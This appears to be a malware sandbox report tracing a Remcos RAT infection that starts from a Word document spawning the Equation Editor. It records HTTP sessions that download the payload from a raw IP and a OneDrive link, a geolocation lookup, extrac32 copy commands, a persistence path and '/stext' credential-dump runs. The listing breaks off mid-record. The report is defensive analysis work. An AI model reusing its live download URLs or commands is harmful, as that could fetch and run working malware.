Apr 24, 2024 07:41:54.083610058 CEST | 312 | OUT | GET /360/HJC.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 103.198.26.173
Connection: Keep-Alive
Apr 24, 2024 07:41:54.512376070 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Wed, 24 Apr 2024 06:41:52 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Mon, 22 Apr 2024 08:30:20 GMT
ETag: "190400-616ab3f81c82f"
Accept-Ranges: bytes
Content-Length: 1639424
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49173 | 178.237.33.50 | 80 | 3572 | C:\ProgramData\Remcos\remcos.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:42:18.367506027 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                                                                                                                                                                  Host: geoplugin.net
                                                                                                                                                                                  Cache-Control: no-cache
Apr 24, 2024 07:42:18.676492929 CEST | 1173 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                  date: Wed, 24 Apr 2024 05:42:18 GMT
                                                                                                                                                                                  server: Apache
                                                                                                                                                                                  content-length: 965
                                                                                                                                                                                  content-type: application/json; charset=utf-8
                                                                                                                                                                                  cache-control: public, max-age=300
                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                  Data Ascii: { "geoplugin_request":"154.16.105.36", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Las Vegas", "geoplugin_region":"Nevada", "geoplugin_regionCode":"NV", "geoplugin_regionName":"Nevada", "geoplugin_areaCode":"", "geoplugin_dmaCode":"839", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"36.1685", "geoplugin_longitude":"-115.1164", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49165 | 13.107.137.11 | 443 | 3416 | C:\Users\user\AppData\Roaming\hjc.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 05:42:02 UTC | 213 | OUT | GET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                  Host: onedrive.live.com
2024-04-24 05:42:03 UTC | 1177 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                  Location: https://oqgpra.db.files.1drv.com/y4mpZajfWPqKjdE4uGrq5tmWJHmffdrvebeUi1KiWBx9grNpUr-Q2JlZ3LArHG3A_O0QfZb6Vfm5WSaPD3kyOwL0lvhBJcVzz9RORkZsQxwD-NGRK76oWxdM4Chy44IeLUE0Tpi2W75Z2hK2CtDKUYyLW_mMwTW_ZM1Mj-T6w-sGDdI059lJiHfmpILNrHyeh-zz1V74lsmMnt2ux1R0n3Hag/255_Rdxcjsnghbl?download&psid=1
                                                                                                                                                                                  Set-Cookie: E=P:17BxRCFk3Ig=:weWtX4vAXYbwkwMNng/Dj3h6gJtw9oFoK5z1byHC4Ug=:F; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xid=dc27097d-14e4-4236-abbf-c7c0d3e01ed7&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 04:02:02 GMT; path=/
                                                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:42:03 GMT; path=/
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  X-MSNServer: 58656754b6-n9vwb
                                                                                                                                                                                  X-ODWebServer: namsouthce155880-odwebpl
                                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                  X-MSEdge-Ref: Ref A: 434BE4F39A1B4FE09A7021410B81D7C1 Ref B: BY3EDGE0212 Ref C: 2024-04-24T05:42:02Z
                                                                                                                                                                                  Date: Wed, 24 Apr 2024 05:42:03 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49168 | 13.107.137.11 | 443 | 3572 | C:\ProgramData\Remcos\remcos.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 05:42:11 UTC | 213 | OUT | GET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                  Host: onedrive.live.com
2024-04-24 05:42:12 UTC | 1177 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                  Location: https://oqgpra.db.files.1drv.com/y4mio8rSS_2jC5-0VIhrGMPPnTg6gYb3Bxmu9ktmO2sVy1Vu5NgT_hEOa73bPesLFGHcLoom_BY6eeAPW-FHnqUKPhfl8sWhpjxEHt7pVekx6nM7q1SW8SVnXHPjZPuVg2rkxPm7gqokPnU5whnFsz2GcUBbv73tTRus4Jl03Vk2nJv6RFSKmpwSZ81Ok-BUBbMc6v_k9dL7o--kBdAqGrTcQ/255_Rdxcjsnghbl?download&psid=1
                                                                                                                                                                                  Set-Cookie: E=P:ndQSSiFk3Ig=:DK0SYrfmoZH/U7P895DhhkPQOcsS751EIF/clKtKkJw=:F; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xid=c0e070e1-2486-42cc-bde5-20047fba4201&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 04:02:11 GMT; path=/
                                                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:42:12 GMT; path=/
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  X-MSNServer: 58656754b6-lpk9s
                                                                                                                                                                                  X-ODWebServer: namsouthce155880-odwebpl
                                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                  X-MSEdge-Ref: Ref A: 73B6CD00DCE340D0B923FA5D7EFD387D Ref B: BY3EDGE0407 Ref C: 2024-04-24T05:42:11Z
                                                                                                                                                                                  Date: Wed, 24 Apr 2024 05:42:12 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49175 | 13.107.137.11 | 443 | 3984 | C:\ProgramData\Remcos\remcos.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 05:42:31 UTC | 213 | OUT | GET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                  Host: onedrive.live.com
2024-04-24 05:42:32 UTC | 1177 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                  Location: https://oqgpra.db.files.1drv.com/y4m8jjd3f9BpBLsSbDI3D4w4BLmop1yruq85sZlFAr-4Rol8mEokjtpsS6ivaddcrG-02EGs-2XauFUjX8FY7d53bCsLcKfkjXgpkSbw6TFx16xDDOU5aSxzi3W5XYaoKCrRHledOCtpWPLiyJxcXorVrYLocVfe5Td3_sPairUMveG-8qBlVjZGG5ac5cYczLGG810pmtWa_QzgyEzjmbnUw/255_Rdxcjsnghbl?download&psid=1
                                                                                                                                                                                  Set-Cookie: E=P:/mPjVSFk3Ig=:oCUg3qyjS8ulDY8hmIZjBIcXufJIiZQndE/MpNRJhn4=:F; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xid=74a65b92-581b-48f2-8cb3-4595ecae77d0&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 04:02:31 GMT; path=/
                                                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:42:32 GMT; path=/
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  X-MSNServer: 58656754b6-knhpb
                                                                                                                                                                                  X-ODWebServer: namsouthce155880-odwebpl
                                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                  X-MSEdge-Ref: Ref A: 9D137ED6D1EF4A5EB0B6070B70E84DD2 Ref B: BY3EDGE0520 Ref C: 2024-04-24T05:42:31Z
                                                                                                                                                                                  Date: Wed, 24 Apr 2024 05:42:31 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49178 | 13.107.137.11 | 443 | 172 | C:\ProgramData\Remcos\remcos.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 05:42:41 UTC | 213 | OUT | GET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                  Host: onedrive.live.com
2024-04-24 05:42:42 UTC | 1177 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                  Location: https://oqgpra.db.files.1drv.com/y4mYCQQoHB3biLh5JPth5_f-kOB87DNi8p0jtMSHrwPoPCEVl-mpqMaKw_mqKIpuxjn2dNG-T2e2xR231bHUFOeFOYUuWZJn-Xs7N1n36MJhDdbtaOw1zjdzwAu5H9Z6mgm3NKd3HlFZY-5KRTk6agT858qEwO2vljQ2INgCwAXfVMQFxW79LWxDTPwEwcdmkpq5bjKDTjQIkrxej8Y9WhNWw/255_Rdxcjsnghbl?download&psid=1
                                                                                                                                                                                  Set-Cookie: E=P:KgisWyFk3Ig=:/+ipv38dN7ivfaJbLIbhASMDuNNeYz8NLi6GcGlYD6s=:F; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xid=4599e02a-0964-4e2b-9694-3247fc8405d9&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 04:02:41 GMT; path=/
                                                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:42:42 GMT; path=/
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  X-MSNServer: 57d8d6c5b8-w62dx
                                                                                                                                                                                  X-ODWebServer: namsouthce375367-odwebpl
                                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                  X-MSEdge-Ref: Ref A: 4323ACDDD43845F5BE165888BE661603 Ref B: BY3EDGE0415 Ref C: 2024-04-24T05:42:41Z
                                                                                                                                                                                  Date: Wed, 24 Apr 2024 05:42:41 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49181 | 13.107.137.11 | 443 | 3268 | C:\ProgramData\Remcos\remcos.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 05:43:01 UTC | 213 | OUT | GET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                  Host: onedrive.live.com
2024-04-24 05:43:02 UTC | 1177 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                  Location: https://oqgpra.db.files.1drv.com/y4m1QphtspBBMGygafIGFYGxEUuSWjKY2dMrUpXGeJNpqtj0i_A5B0XA1Aj7IMN8zjTgS9cMKAwTkj3FT5dXi2Eg2jSyv8_UUS0rdYNG0v0tQXlGRPZqXWmOEp1BuNTfvOXcE-pcZOsWsbrL26_I-vlDCLysJ0C7mY-EdGwevGP_cX1b9ESa_DJG5Tasdj_V6zCOP83wqnIMrfXBpw083kXBg/255_Rdxcjsnghbl?download&psid=1
                                                                                                                                                                                  Set-Cookie: E=P:+S6JZyFk3Ig=:LdxGwW+LRdtGMCX5i6z2tEKPVBKB4IYlUfIKRnX/HNk=:F; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xid=c54efc3b-3547-4b0e-916c-e215cb810e8e&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 04:03:01 GMT; path=/
                                                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:43:02 GMT; path=/
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  X-MSNServer: 57d8d6c5b8-wtd7d
                                                                                                                                                                                  X-ODWebServer: namsouthce375367-odwebpl
                                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                  X-MSEdge-Ref: Ref A: 73B2F62BC67F4CC6B3AD1E513D2941AA Ref B: BY3EDGE0320 Ref C: 2024-04-24T05:43:01Z
                                                                                                                                                                                  Date: Wed, 24 Apr 2024 05:43:01 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:07:41:50
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                                  Imagebase:0x13f240000
                                                                                                                                                                                  File size:1'423'704 bytes
                                                                                                                                                                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                  Start time:07:41:51
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:543'304 bytes
                                                                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                  Start time:07:41:59
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\hjc.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\hjc.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.372380692.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000005.00000002.374068622.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                  Start time:07:42:06
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RdxcjsngO.bat" "
                                                                                                                                                                                  Imagebase:0x49e00000
                                                                                                                                                                                  File size:302'592 bytes
                                                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                  Start time:07:42:06
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\hjc.exe C:\\Users\\Public\\Libraries\\Rdxcjsng.PIF
                                                                                                                                                                                  Imagebase:0x120000
                                                                                                                                                                                  File size:53'248 bytes
                                                                                                                                                                                  MD5 hash:4D306ED01994EDF577B98FD59BF269C0
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                  Start time:07:42:07
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.848171681.00000000157EB000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                  Start time:07:42:17
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Users\Public\Libraries\Rdxcjsng.PIF
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\Public\Libraries\Rdxcjsng.PIF"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.395322214.0000000000729000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.399844258.0000000014D2B000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000C.00000002.396383723.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000C.00000002.396855031.00000000031D1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                  Start time:07:42:20
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\qrvhclucfnyufuwghezckwpljsyrzdsj"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                  Start time:07:42:21
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\amas"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                  Start time:07:42:21
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:543'304 bytes
                                                                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                  Start time:07:42:21
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\dgnkdwq"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                  Start time:07:42:28
                                                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                                                  MD5 hash:46AE1DD2F5A1756EC2166E365971254D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
